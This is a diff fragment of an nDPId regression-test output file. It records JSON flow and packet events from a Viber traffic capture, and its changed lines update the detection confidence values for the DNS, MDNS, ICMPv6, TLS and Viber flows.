+00902{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":129,"source":"viber.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1527155646850,"flow_last_seen":1527155646862,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":679,"flow_avg_l4_payload_len":113,"midstream":0,"thread_ts_msec":1527155646862,"l3_proto":"ip4","src_ip":"192.168.0.17","dst_ip":"172.217.23.78","src_port":43702,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"app-measurement.com","ja3":"3967ff2d2c9c4d144e7e30f24f4e9761","ja3s":"67619a80665d7ab92d1041b1d11f9164","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"http\/1.1"}} 00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":136,"source":"viber.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1527155646968,"flow_last_seen":1527155646968,"flow_idle_time":200000,"flow_min_l4_payload_len":61,"flow_max_l4_payload_len":61,"flow_tot_l4_payload_len":61,"flow_avg_l4_payload_len":61,"midstream":0,"thread_ts_msec":1527155646968,"l3_proto":"ip4","src_ip":"192.168.0.17","dst_ip":"224.0.0.251","src_port":5353,"dst_port":5353,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00518{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":136,"source":"viber.pcap","alias":"nDPId-test","flow_id":14,"flow_packet_id":1,"flow_last_seen":1527155646968,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":103,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":103,"pkt_l4_len":69,"thread_ts_msec":1527155646968,"pkt":"AQBeAAD7MAdNo1+nCABFAABZHwxAAP8RutLAqAAR4AAA+xTpFOkARSvHAAQAAAACAAAAAAAACV84MDU3NDFDOQRfc3ViC19nb29nbGVjYXN0BF90Y3AFbG9jYWwAAAwAAcAbAAwAAQ=="} -00695{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":136,"source":"viber.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1527155646968,"flow_last_seen":1527155646968,"flow_idle_time":200000,"flow_min_l4_payload_len":61,"flow_max_l4_payload_len":61,"flow_tot_l4_payload_len":61,"flow_avg_l4_payload_len":61,"midstream":0,"thread_ts_msec":1527155646968,"l3_proto":"ip4","src_ip":"192.168.0.17","dst_ip":"224.0.0.251","src_port":5353,"dst_port":5353,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"MDNS","breed":"Acceptable","category":"Network"},"mdns": {"answer":"_805741c9._sub._googlecast._tcp.local"}} +00695{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":136,"source":"viber.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1527155646968,"flow_last_seen":1527155646968,"flow_idle_time":200000,"flow_min_l4_payload_len":61,"flow_max_l4_payload_len":61,"flow_tot_l4_payload_len":61,"flow_avg_l4_payload_len":61,"midstream":0,"thread_ts_msec":1527155646968,"l3_proto":"ip4","src_ip":"192.168.0.17","dst_ip":"224.0.0.251","src_port":5353,"dst_port":5353,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"MDNS","breed":"Acceptable","category":"Network"},"mdns": {"answer":"_805741c9._sub._googlecast._tcp.local"}} 00518{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":137,"source":"viber.pcap","alias":"nDPId-test","flow_id":14,"flow_packet_id":2,"flow_last_seen":1527155646968,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":103,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":103,"pkt_l4_len":69,"thread_ts_msec":1527155646968,"pkt":"AQBeAAD7MAdNo1+nCABFAABZHwxAAP8RutLAqAAR4AAA+xTpFOkARSvHAAQAAAACAAAAAAAACV84MDU3NDFDOQRfc3ViC19nb29nbGVjYXN0BF90Y3AFbG9jYWwAAAwAAcAbAAwAAQ=="} 00556{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":208,"source":"viber.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1527155647500,"flow_last_seen":1527155647500,"flow_idle_time":140000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":16,"flow_avg_l4_payload_len":16,"midstream":0,"thread_ts_msec":1527155647500,"l3_proto":"ip6","src_ip":"fe80::3207:4dff:fea3:5fa7","dst_ip":"ff02::2","l4_proto":"icmp6","flow_datalink":1,"flow_max_packets":3} 00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":208,"source":"viber.pcap","alias":"nDPId-test","flow_id":15,"flow_packet_id":1,"flow_last_seen":1527155647500,"flow_idle_time":140000,"pkt_oversize":false,"pkt_caplen":70,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":70,"pkt_l4_len":16,"thread_ts_msec":1527155647500,"pkt":"MzMAAAACMAdNo1+nht1gAAAAABA6\/\/6AAAAAAAAAMgdN\/\/6jX6f\/AgAAAAAAAAAAAAAAAAAChQDAigAAAAABATAHTaNfpw=="} -00617{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":208,"source":"viber.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1527155647500,"flow_last_seen":1527155647500,"flow_idle_time":140000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":16,"flow_avg_l4_payload_len":16,"midstream":0,"thread_ts_msec":1527155647500,"l3_proto":"ip6","src_ip":"fe80::3207:4dff:fea3:5fa7","dst_ip":"ff02::2","l4_proto":"icmp6","ndpi": {"confidence": {"4":"DPI"},"proto":"ICMPV6","breed":"Acceptable","category":"Network"}} +00617{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":208,"source":"viber.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1527155647500,"flow_last_seen":1527155647500,"flow_idle_time":140000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":16,"flow_avg_l4_payload_len":16,"midstream":0,"thread_ts_msec":1527155647500,"l3_proto":"ip6","src_ip":"fe80::3207:4dff:fea3:5fa7","dst_ip":"ff02::2","l4_proto":"icmp6","ndpi": {"confidence": {"6":"DPI"},"proto":"ICMPV6","breed":"Acceptable","category":"Network"}} 00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":209,"source":"viber.pcap","alias":"nDPId-test","flow_id":15,"flow_packet_id":2,"flow_last_seen":1527155647500,"flow_idle_time":140000,"pkt_oversize":false,"pkt_caplen":70,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":70,"pkt_l4_len":16,"thread_ts_msec":1527155647500,"pkt":"MzMAAAACMAdNo1+nht1gAAAAABA6\/\/6AAAAAAAAAMgdN\/\/6jX6f\/AgAAAAAAAAAAAAAAAAAChQDAigAAAAABATAHTaNfpw=="} 00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":210,"source":"viber.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1527155648481,"flow_last_seen":1527155648481,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1527155648481,"l3_proto":"ip4","src_ip":"192.168.0.17","dst_ip":"192.168.0.15","src_port":44376,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00488{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":210,"source":"viber.pcap","alias":"nDPId-test","flow_id":16,"flow_packet_id":1,"flow_last_seen":1527155648481,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":82,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":82,"pkt_l4_len":48,"thread_ts_msec":1527155648481,"pkt":"AA6OMNv9MAdNo1+nCABFAABEJLZAAEARlILAqAARwKgAD61YADUAMDkH00kBAAABAAAAAAAAB3ZlbmV0aWEDaWFkBmFwcGJveQNjb20AAAEAAQ=="} -00773{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":210,"source":"viber.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1527155648481,"flow_last_seen":1527155648481,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1527155648481,"l3_proto":"ip4","src_ip":"192.168.0.17","dst_ip":"192.168.0.15","src_port":44376,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"venetia.iad.appboy.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00773{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":210,"source":"viber.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1527155648481,"flow_last_seen":1527155648481,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1527155648481,"l3_proto":"ip4","src_ip":"192.168.0.17","dst_ip":"192.168.0.15","src_port":44376,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"venetia.iad.appboy.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00623{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":211,"source":"viber.pcap","alias":"nDPId-test","flow_id":16,"flow_packet_id":2,"flow_last_seen":1527155648506,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":183,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":183,"pkt_l4_len":149,"thread_ts_msec":1527155648506,"pkt":"MAdNo1+nAA6OMNv9CABFAACpXKlAAEARXCrAqAAPwKgAEQA1rVgAlY7c00mBgAABAAUAAAAAB3ZlbmV0aWEDaWFkBmFwcGJveQNjb20AAAEAAcAMAAUAAQAAAQIAGQF5A3NzbAZnbG9iYWwGZmFzdGx5A25ldADANAABAAEAAAAdAASXZQGCwDQAAQABAAAAHQAEl2VBgsA0AAEAAQAAAB0ABJdlgYLANAABAAEAAAAdAASXZcGC"} -00789{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":211,"source":"viber.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1527155648481,"flow_last_seen":1527155648506,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":181,"flow_avg_l4_payload_len":90,"midstream":0,"thread_ts_msec":1527155648506,"l3_proto":"ip4","src_ip":"192.168.0.17","dst_ip":"192.168.0.15","src_port":44376,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"venetia.iad.appboy.com","num_queries":1,"num_answers":5,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"151.101.1.130"}} +00789{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":211,"source":"viber.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1527155648481,"flow_last_seen":1527155648506,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":181,"flow_avg_l4_payload_len":90,"midstream":0,"thread_ts_msec":1527155648506,"l3_proto":"ip4","src_ip":"192.168.0.17","dst_ip":"192.168.0.15","src_port":44376,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"venetia.iad.appboy.com","num_queries":1,"num_answers":5,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"151.101.1.130"}} 00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":212,"source":"viber.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1527155648513,"flow_last_seen":1527155648513,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1527155648513,"l3_proto":"ip4","src_ip":"192.168.0.17","dst_ip":"151.101.1.130","src_port":55746,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":212,"source":"viber.pcap","alias":"nDPId-test","flow_id":17,"flow_packet_id":1,"flow_last_seen":1527155648513,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1527155648513,"pkt":"AA6OMNv9MAdNo1+nCABFAAA8cjBAAEAGbuvAqAARl2UBgtnCAbvgBRgtAAAAAKAC\/\/+wcAAAAgQFtAQCCAoAIWodAAAAAAEDAwc="} 00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":213,"source":"viber.pcap","alias":"nDPId-test","flow_id":17,"flow_packet_id":2,"flow_last_seen":1527155648523,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1527155648523,"pkt":"MAdNo1+nAA6OMNv9CABFAAA8AABAADoG5xuXZQGCwKgAEQG72cJzm\/EW4AUYLqAScSBKVAAAAgQFtAQCCArIDMgpACFqHQEDAwk="} 00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":214,"source":"viber.pcap","alias":"nDPId-test","flow_id":17,"flow_packet_id":3,"flow_last_seen":1527155648526,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1527155648526,"pkt":"AA6OMNv9MAdNo1+nCABFAAA0cjFAAEAGbvLAqAARl2UBgtnCAbvgBRguc5vxF4AQAq3nkgAAAQEICgAhaiDIDMgp"} -00837{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":215,"source":"viber.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1527155648513,"flow_last_seen":1527155648533,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":184,"flow_tot_l4_payload_len":184,"flow_avg_l4_payload_len":46,"midstream":0,"thread_ts_msec":1527155648533,"l3_proto":"ip4","src_ip":"192.168.0.17","dst_ip":"151.101.1.130","src_port":55746,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"venetia.iad.appboy.com","ja3":"d8c87b9bfde38897979e41242626c2f3","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"http\/1.1"}} +00837{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":215,"source":"viber.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1527155648513,"flow_last_seen":1527155648533,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":184,"flow_tot_l4_payload_len":184,"flow_avg_l4_payload_len":46,"midstream":0,"thread_ts_msec":1527155648533,"l3_proto":"ip4","src_ip":"192.168.0.17","dst_ip":"151.101.1.130","src_port":55746,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"venetia.iad.appboy.com","ja3":"d8c87b9bfde38897979e41242626c2f3","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"http\/1.1"}} +00848{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":217,"source":"viber.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1527155648513,"flow_last_seen":1527155648544,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":1632,"flow_avg_l4_payload_len":272,"midstream":0,"thread_ts_msec":1527155648544,"l3_proto":"ip4","src_ip":"192.168.0.17","dst_ip":"151.101.1.130","src_port":55746,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"venetia.iad.appboy.com","ja3":"d8c87b9bfde38897979e41242626c2f3","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"http\/1.1"}} 00518{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":255,"source":"viber.pcap","alias":"nDPId-test","flow_id":14,"flow_packet_id":3,"flow_last_seen":1527155666982,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":103,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":103,"pkt_l4_len":69,"thread_ts_msec":1527155666982,"pkt":"AQBeAAD7MAdNo1+nCABFAABZIsxAAP8RtxLAqAAR4AAA+xTpFOkARSvGAAUAAAACAAAAAAAACV84MDU3NDFDOQRfc3ViC19nb29nbGVjYXN0BF90Y3AFbG9jYWwAAAwAAcAbAAwAAQ=="} 00646{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":257,"source":"viber.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":32,"flow_first_seen":1527155638428,"flow_last_seen":1527155670525,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":530,"flow_tot_l4_payload_len":2871,"flow_avg_l4_payload_len":89,"midstream":1,"thread_ts_msec":1527155670525,"l3_proto":"ip4","src_ip":"192.168.0.17","dst_ip":"52.0.253.101","src_port":33208,"dst_port":4244,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"Viber","breed":"Acceptable","category":"VoIP"}} 00647{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":257,"source":"viber.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":32,"flow_first_seen":1527155638428,"flow_last_seen":1527155670525,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":530,"flow_tot_l4_payload_len":2871,"flow_avg_l4_payload_len":89,"midstream":1,"thread_ts_msec":1527155670525,"l3_proto":"ip4","src_ip":"192.168.0.17","dst_ip":"52.0.253.101","src_port":33208,"dst_port":4244,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"Viber","breed":"Acceptable","category":"VoIP"}} @@ -95,10 +97,10 @@ 00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":260,"source":"viber.pcap","alias":"nDPId-test","flow_id":18,"flow_packet_id":1,"flow_last_seen":1527155670632,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1527155670632,"pkt":"AA6OMNv9MAdNo1+nCABFAAA8WoBAAEAGCJrAqAAREskEILFwAbuQXSU3AAAAAKAC\/\/+HxQAAAgQFtAQCCAoAIX+3AAAAAAEDAwc="} 00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":261,"source":"viber.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1527155670640,"flow_last_seen":1527155670640,"flow_idle_time":200000,"flow_min_l4_payload_len":257,"flow_max_l4_payload_len":257,"flow_tot_l4_payload_len":257,"flow_avg_l4_payload_len":257,"midstream":0,"thread_ts_msec":1527155670640,"l3_proto":"ip4","src_ip":"192.168.0.17","dst_ip":"18.201.4.32","src_port":47171,"dst_port":7985,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00782{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":261,"source":"viber.pcap","alias":"nDPId-test","flow_id":19,"flow_packet_id":1,"flow_last_seen":1527155670640,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":299,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":299,"pkt_l4_len":265,"thread_ts_msec":1527155670640,"pkt":"AA6OMNv9MAdNo1+nCABFiAEdfMxAAEAR5NnAqAAREskEILhDHzEBCRHz7fYBAAUArBk1jI9k5EcHridUEQCowEO4MgAAAEMBABABAK45kpFjAQAAAAAAACXfTU7hzTcbXJq8JtnTC0sBuzmzAAAAAAAAAAADAAEAZgIAZwABeAAAAAAAAIAAvcYFlBohustZk1e\/8OyZiSqP86k39WGwDkG7f\/rMnT2tcfHi3zlsEfu0kKTP5bAY2qxB7\/oc6uBQ0Wmie0yDB6f1EwNZ4BrIBNZIXKB4sgy96MQL790EZYw7fY9vCydMCFozrGypXQPtcVrV5xCrsYqA8zuDlnCD1lV04sfnGYMAAAAAAAAAAEcFAAA4AAAAEABBbmRyb2lkLDguOS4wLjIAAAA="} -00639{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":261,"source":"viber.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1527155670640,"flow_last_seen":1527155670640,"flow_idle_time":200000,"flow_min_l4_payload_len":257,"flow_max_l4_payload_len":257,"flow_tot_l4_payload_len":257,"flow_avg_l4_payload_len":257,"midstream":0,"thread_ts_msec":1527155670640,"l3_proto":"ip4","src_ip":"192.168.0.17","dst_ip":"18.201.4.32","src_port":47171,"dst_port":7985,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Viber","breed":"Acceptable","category":"VoIP"}} +00639{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":261,"source":"viber.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1527155670640,"flow_last_seen":1527155670640,"flow_idle_time":200000,"flow_min_l4_payload_len":257,"flow_max_l4_payload_len":257,"flow_tot_l4_payload_len":257,"flow_avg_l4_payload_len":257,"midstream":0,"thread_ts_msec":1527155670640,"l3_proto":"ip4","src_ip":"192.168.0.17","dst_ip":"18.201.4.32","src_port":47171,"dst_port":7985,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Viber","breed":"Acceptable","category":"VoIP"}} 00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":262,"source":"viber.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1527155670640,"flow_last_seen":1527155670640,"flow_idle_time":200000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":1527155670640,"l3_proto":"ip4","src_ip":"192.168.0.17","dst_ip":"18.201.4.32","src_port":47171,"dst_port":7987,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":262,"source":"viber.pcap","alias":"nDPId-test","flow_id":20,"flow_packet_id":1,"flow_last_seen":1527155670640,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":76,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":76,"pkt_l4_len":42,"thread_ts_msec":1527155670640,"pkt":"AA6OMNv9MAdNo1+nCABFiAA+fM1AAEAR5bfAqAAREskEILhDHzMAKi7T7fYZAKwZNYyPZORHJd9NTuHNNxtcmrwm2dMLSwG7ObMAAA=="} -00635{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":262,"source":"viber.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1527155670640,"flow_last_seen":1527155670640,"flow_idle_time":200000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":1527155670640,"l3_proto":"ip4","src_ip":"192.168.0.17","dst_ip":"18.201.4.32","src_port":47171,"dst_port":7987,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Viber","breed":"Acceptable","category":"VoIP"}} +00635{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":262,"source":"viber.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1527155670640,"flow_last_seen":1527155670640,"flow_idle_time":200000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":1527155670640,"l3_proto":"ip4","src_ip":"192.168.0.17","dst_ip":"18.201.4.32","src_port":47171,"dst_port":7987,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Viber","breed":"Acceptable","category":"VoIP"}} 00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":263,"source":"viber.pcap","alias":"nDPId-test","flow_id":19,"flow_packet_id":2,"flow_last_seen":1527155670640,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1527155670640,"pkt":"AA6OMNv9MAdNo1+nCABFiAAwfM5AAEAR5cTAqAAREskEILhDHzEAHFuJ7fYJALM5kpFjAQAArBk1jI9k5Ec="} 00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":264,"source":"viber.pcap","alias":"nDPId-test","flow_id":18,"flow_packet_id":2,"flow_last_seen":1527155670663,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1527155670663,"pkt":"MAdNo1+nAA6OMNv9CABFAAA8AABAACsGeBoSyQQgwKgAEQG7sXDMrFlhkF0lOKASaN8nuwAAAgQFtAQCCAoAWtCxACF\/twEDAwc="} 00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":265,"source":"viber.pcap","alias":"nDPId-test","flow_id":20,"flow_packet_id":2,"flow_last_seen":1527155670672,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1527155670672,"pkt":"MAdNo1+nAA6OMNv9CABFAAAwfVFAACsR+skSyQQgwKgAER8zuEMAHAAy7fYaAKwZNYyPZORHMkN8XkO4AMg="} @@ -108,17 +110,17 @@ 00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":269,"source":"viber.pcap","alias":"nDPId-test","flow_id":21,"flow_packet_id":1,"flow_last_seen":1527155671066,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1527155671066,"pkt":"AA6OMNv9MAdNo1+nCABFAAA8FY9AAEAG0gLAqAARNrtbtr+YAbtog5WsAAAAAKAC\/\/+1DQAAAgQFtAQCCAoAIYAjAAAAAAEDAwc="} 00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":274,"source":"viber.pcap","alias":"nDPId-test","flow_id":21,"flow_packet_id":2,"flow_last_seen":1527155671237,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1527155671237,"pkt":"MAdNo1+nAA6OMNv9CABFAAA8AABAAOYGQZE2u1u2wKgAEQG7v5iCE\/ghaIOVraASaN+HqAAAAgQFtAQCCAosBh44ACGAIwEDAwg="} 